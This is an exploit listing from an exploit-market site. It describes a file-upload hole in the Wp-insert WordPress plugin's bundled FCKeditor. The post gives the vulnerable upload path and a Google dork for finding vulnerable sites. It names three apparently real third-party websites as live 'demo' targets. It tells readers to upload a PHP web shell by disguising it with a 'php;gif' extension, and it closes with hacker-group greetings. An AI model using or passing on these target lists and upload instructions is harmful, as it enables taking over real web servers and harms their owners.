[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Plugin Wp-insert [FCKeditor] Upload Shell

Author
Hacker-Fire
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-17994
Category
web applications
Date add
07-04-2012
Platform
php
##################################################
# Exploit Title: [Wp-insert Wordpress Plugin [FCKeditor] Upload]
# Date: [06-04-2012]
# Author: [Hacker-Fire]
# Category:: [ webapps]
# Software Link: [http://wordpress.org/extend/plugins/wp-insert/]
# Google dork: [ /wp-insert/fckeditor/]
# Tested on: [Windows 7 & BT5r2 ]
# Demo site: [http://www.hiphopcongress.com/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/frmupload.html]
[http://fop95.com/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/frmupload.html]
[http://elles.centrepompidou.fr/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/frmupload.html]
##################################################

[~] P0c [~] :

Vuln Upload file in :

localhost/PATH/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/frmupload.html

Upload Your Shell : php;gif  & Enjoy .

##########################################################
[»] Greetz to :
                     
[ TrOon,Aghilas,r00t_dz,EliteTorjan,Vaga-hacker,xConsole,OverDz ] 
[ & -> Th3 Viper,BriscO-Dz,LaMiN Dk, xV!rus , black hool ]             
[ And all my Freinds + Algerian Hackers ]
       
##########################################################



#  0day.today [2024-12-24]  #